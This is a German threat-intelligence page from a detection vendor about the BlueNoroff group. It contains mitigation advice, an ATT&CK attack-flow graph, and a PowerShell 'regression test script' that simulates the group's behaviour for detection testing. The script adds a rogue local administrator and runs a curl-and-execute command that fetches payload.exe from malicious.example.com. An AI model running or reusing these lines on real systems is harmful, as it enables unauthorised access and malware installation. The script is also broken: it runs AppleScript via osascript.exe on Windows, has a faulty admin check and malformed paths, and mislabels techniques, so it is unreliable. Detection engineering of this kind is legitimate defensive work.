SOC Prime Bias: Kritisch

21 Jan. 2026 18:58
newspaper icon picussecurity.com

BlueNoroff-Gruppe: Der finanzielle Cyberkriminalitätsarm von Lazarus

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Folgen
BlueNoroff-Gruppe: Der finanzielle Cyberkriminalitätsarm von Lazarus
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Zusammenfassung

BlueNoroff ist eine finanziell orientierte Untergruppe innerhalb des Lazarus-Ökosystems, die sich auf Diebstähle mit hohem Wert gegen Banken, Kryptowährungsfirmen und breitere Web3-Ziele konzentriert. Das Handbuch der Gruppe umfasst SWIFT-fähigen Betrug, Watering-Hole-Kompromittierungen, Supply-Chain-Vergiftungen von Go-Paketen und macOS-Einbruchspfade, die um gefälschte „Bewerbungsgespräch“-Köder herum aufgebaut sind. Um Ausführung und Persistenz zu erreichen, kombiniert BlueNoroff einen modularen Rust/Go-Malware-Stack mit AppleScript-, VBScript- und Social-Engineering-Arbeitsabläufen, die darauf ausgelegt sind, Benutzerwarnungen zu umgehen und sich in legitime Entwicklungs- und Verwaltungsaktivitäten einzufügen.

Untersuchung

Der Bericht verfolgt die Entwicklung von BlueNoroff vom Banküberfall in Bangladesch 2016 bis zu neueren Aktivitäten in der Supply-Chain-Ära 2025 und hebt hervor, wie sich das Werkzeug und die Zielsetzung des Akteurs parallel zum Krypto-/Web3-Ökosystem erweitert haben. Forscher skizzieren Infrastrukturmuster und katalogisieren Malware-Komponenten wie GhostCall, GhostHire, RustBucket und GillyInjector. Die Untersuchung kartiert auch beobachtete Verhaltensweisen zu MITRE ATT&CK über Phasen wie Aufklärung und anfänglicher Zugriff, dann Ausführung, Persistenz und Anmeldeinformationsdiebstahl – und unterstreicht eine konsequente Betonung auf heimliche Stützpunkte, gestufte Nutzlastbereitstellung und diebstahlbereite Zugangspfade.

Abschwächung

Reduzieren Sie die Exposition durch eine straffere Supply-Chain-Hygiene: Validieren Sie Pakete, die aus öffentlichen Registern gezogen werden, erzwingen Sie das Festlegen und die Herkunftskontrollen und überprüfen Sie kontinuierlich Abhängigkeitsaktualisierungen auf unerwartete Änderungen von Wartungspersonen oder Code. Härten Sie auf macOS die LaunchAgent/LaunchDaemon-Verwaltung und überwachen Sie verdächtige Persistenzeinträge und unsignierte Werkzeuge. Blockieren Sie ähnlich aussehende Domains, die für Köderlieferung verwendet werden, erzwingen Sie MFA für privilegierte Identitäten und extern exponierte Dienste, und operationalisieren Sie Erkennungen für bekannte bösartige Skripte, Lader und Packtechniken, die mit dem Akteur in Verbindung stehen. Halten Sie Bedrohungsintelligenz-Updates häufig und verstärken Sie das Benutzertraining mit dem Fokus auf Spear-Phishing und „Personalvermittler/Bewerbungsgespräch“-Social-Engineering-Muster.

Reaktion

Wenn BlueNoroff-Indikatoren entdeckt werden, isolieren Sie betroffene Hosts und bewahren Sie wichtige Beweise auf, einschließlich vollständiger Befehlszeilen, Skriptinhalte und abgelegter Binärdateien oder Paket-Artefakte. Blockieren Sie identifizierte bösartige Domains und C2-IPs, und führen Sie dann Incident-Response-Playbooks aus, die auf Szenarien des Anmeldeinformationsdiebstahls und der Supply-Chain-Kompromittierung ausgerichtet sind. Implementieren oder optimieren Sie Erkennungen für AppleScript- und VBScript-Ausführungsketten sowie für verdächtige PowerShell-Muster, die im Bericht erwähnt werden, und erweitern Sie die Jagd, um zusätzliche Endpunkte zu identifizieren, die demselben Köder-, Abhängigkeits- oder Infrastrukturüberlappung ausgesetzt sind.

„graph TB %% Class Definitions classDef technique fill:#99ccff classDef action fill:#ffdd99 classDef operator fill:#ff9900 %% Technique Nodes gather_identity[„<b>Technik</b> – <b>T1589 Sammlung von Identitätsinformationen des Opfers</b><br/>Sammelt persönliche, berufliche und Online-Informationen über das Ziel.“] class gather_identity technique search_social[„<b>Technik</b> – <b>T1593.001 Suche in sozialen Medien</b><br/>Durchsucht die vom Opfer besessenen sozialen Medienkonten, um nützliche Daten zu finden.“] class search_social technique phish_info[„<b>Technik</b> – <b>T1598.001 Phishing nach Informationen</b><br/>Erstellt Nachrichten, um Opfer dazu zu bringen, Anmeldeinformationen oder andere Daten preiszugeben.“] class phish_info technique spearphish_service[„<b>Technik</b> – <b>T1566.003 Spearphishing über Dienst</b><br/>Verwendet einen legitimen Online-Dienst, um bösartige Inhalte an das Opfer zu liefern.“] class spearphish_service technique launch_agent[„<b>Technik</b> – <b>T1543.001 Startagent</b><br/>Installiert einen macOS-Startagenten, um Persistenz zu erreichen.“] class launch_agent technique launch_daemon[„<b>Technik</b> – <b>T1543.004 Startdaemon</b><br/>Installiert einen macOS-Startdaemon, um Persistenz zu erreichen.“] class launch_daemon technique tcc_manip[„<b>Technik</b> – <b>T1548.006 TCC-Manipulation</b><br/>Ändert Einstellungen für Transparenz, Zustimmung und Kontrolle, um höhere Privilegien zu erlangen.“] class tcc_manip technique software_packing[„<b>Technik</b> – <b>T1027.002 Software-Packaging</b><br/>Komprimiert oder verschlüsselt die Nutzlast, um eine Analyse zu umgehen.“] class software_packing technique masquerading[„<b>Technik</b> – <b>T1036.005 Maskierung</b><br/>Benennt Dateien um oder verwendet vertraute Symbole, um legitim zu erscheinen.“] class masquerading technique gui_input[„<b>Technik</b> – <b>T1056.002 GUI-Eingabeerfassung</b><br/>Zeichnet Tastendrücke oder Mauseingaben von grafischen Oberflächen auf, um Anmeldeinformationen zu stehlen.“] class gui_input technique system_info[„<b>Technik</b> – <b>T1082 Systeminformationsentdeckung</b><br/>Sammelt OS-Version, Hardware-Details und installierte Software.“] class system_info technique data_local[„<b>Technik</b> – <b>T1005 Daten vom lokalen System</b><br/>Kopiert interessante Dateien vom infizierten Host.“] class data_local technique local_staging[„<b>Technik</b> – <b>T1074.001 Lokale Datenbereitstellung</b><br/>Platziert gesammelte Daten in einem Verzeichnis zur späteren Exfiltration.“] class local_staging technique web_protocols[„<b>Technik</b> – <b>T1071.001 Web-Protokolle</b><br/>Verwendet HTTP/HTTPS für Befehls- und Steuerverkehr.“] class web_protocols technique dead_drop[„<b>Technik</b> – <b>T1102.001 Dead-Drop Resolver</b><br/>Ruft Anweisungen von einem öffentlich gehosteten Standort ab.“] class dead_drop technique bidirectional[„<b>Technik</b> – <b>T1102.002 Bidirektionales Command and Control</b><br/>Ermöglicht eine Zwei-Wege-Kommunikation zwischen Angreifer und Malware.“] class bidirectional technique oneway[„<b>Technik</b> – <b>T1102.003 Ein-Wege Command and Control</b><br/>Empfängt nur Befehle vom Angreifer, ohne Daten zurückzusenden.“] class oneway technique %% Action Nodes user_click[„<b>Aktion</b> – Benutzer klickt auf bösartigen Link und lädt Nutzlast herunter“] class user_click action %% Operator Node (optional AND for persistence options) op_persistence((„UND“)) class op_persistence operator %% Connections gather_identity u002du002d>|führt zu| search_social search_social u002du002d>|führt zu| phish_info phish_info u002du002d>|führt zu| spearphish_service spearphish_service u002du002d>|löst aus| user_click user_click u002du002d>|etabliert| op_persistence op_persistence u002du002d>|verwendet| launch_agent op_persistence u002du002d>|verwendet| launch_daemon launch_agent u002du002d>|ermöglicht| tcc_manip launch_daemon u002du002d>|ermöglicht| tcc_manip tcc_manip u002du002d>|ermöglicht| software_packing tcc_manip u002du002d>|ermöglicht| masquerading software_packing u002du002d>|erleichtert| gui_input masquerading u002du002d>|erleichtert| gui_input gui_input u002du002d>|bietet| system_info system_info u002du002d>|unterstützt| data_local data_local u002du002d>|bereitet vor| local_staging local_staging u002du002d>|exfiltriert über| web_protocols web_protocols u002du002d>|unterstützt| dead_drop dead_drop u002du002d>|unterstützt| bidirectional bidirectional u002du002d>|unterstützt| oneway „

Angriffsfluss

Simulation-Ausführung

Voraussetzung: Die Telemetrie- & Baseline-Pre-Flight-Überprüfung muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der gegnerischen Technik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Kommandos und Erzählungen MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht zusammenhängende Beispiele führen zu Fehldiagnosen.

  • Angriffsnarrativ & Befehle:

    1. AppleScript-Ausführung (T1546.016) – Der Gegner legt ein bösartiges payload.scpt auf dem Endpunkt ab (z. B. über einen Phishing-Anhang). Mithilfe eines vorinstallierten osascript.exe (gebündelt mit einem Drittanbietertool), starten sie das Skript, um eine PowerShell-Nutzlast auszuführen, die ein neues lokales Administratorkonto hinzufügt.
    2. ClickFix-Zwischenablagenlieferung (T1204.004)  – Der Angreifer kopiert einen gestalteten Befehl in die Zwischenablage, der curl mit einem Zoom-ähnlichen Benutzeragenten aufruft, um eine Nutzlast der zweiten Stufe herunterzuladen, und führt diese dann sofort über cmd.exeaus. Der Befehl enthält auch einen Inline powershell.exe -c Aufruf, um die Nutzlast im Speicher auszuführen.

  • Regression-Testskript: Das untenstehende Skript reproduziert beide Verhaltensweisen auf deterministische Weise.

    #----- BEGIN REGRESSION TEST SCRIPT -----
# Stellen Sie sicher, dass wir mit administrativen Rechten arbeiten
if (-not ([Security.Principal.WindowsPrincipal] `
    [Security.Principal.WindowsBuiltInRole] "Administrator")) {
    Write-Error "Führen Sie dieses Skript als Administrator aus."
    exit 1
}

# 1. AppleScript-Ausführung über osascript.exe
$appleScriptPath = "$env:TEMPmalicious.scpt"
Set-Content -Path $appleScriptPath -Value @"
tell application "System Events"
    do shell script "powershell -c `"Add-LocalGroupMember -Group 'Administrators' -Member 'eviluser'`""
end tell
"@
# Führen Sie das AppleScript aus
Start-Process -FilePath "osascript.exe" -ArgumentList "`"$appleScriptPath`"" -NoNewWindow -Wait

# 2. ClickFix-Style-Zwischenablage-Lieferung
$clickFixCmd = 'curl -A "ZoomSDK" http://malicious.example.com/payload.exe -o $env:TEMPpayload.exe && powershell.exe -c "Start-Process $env:TEMPpayload.exe"'
# Führen Sie über cmd.exe aus, um die Regelbedingung zu erfüllen
Start-Process -FilePath "cmd.exe" -ArgumentList "/c `$clickFixCmd" -NoNewWindow -Wait

# Aufräumen: Artefakte entfernen
Remove-Item -Path $appleScriptPath -Force
Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue
# Ende des Skripts
#----- END REGRESSION TEST SCRIPT -----

  • Aufräumkommandos: Entfernen Sie alle verbleibenden Prozesse, Dateien und das Testbenutzerkonto.

    # Stoppen Sie alle verbleibenden Prozesse (defensiv – normalerweise nicht erforderlich)
Get-Process -Name "osascript","cmd","powershell","payload" -ErrorAction SilentlyContinue | Stop-Process -Force

# Temporäre Dateien löschen
Remove-Item -Path "$env:TEMPmalicious.scpt" -Force -ErrorAction SilentlyContinue
Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue

# Entfernen Sie das Testadministrator-Konto, falls es erstellt wurde
if (Get-LocalUser -Name "eviluser" -ErrorAction SilentlyContinue) {
    Remove-LocalUser -Name "eviluser"
}

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten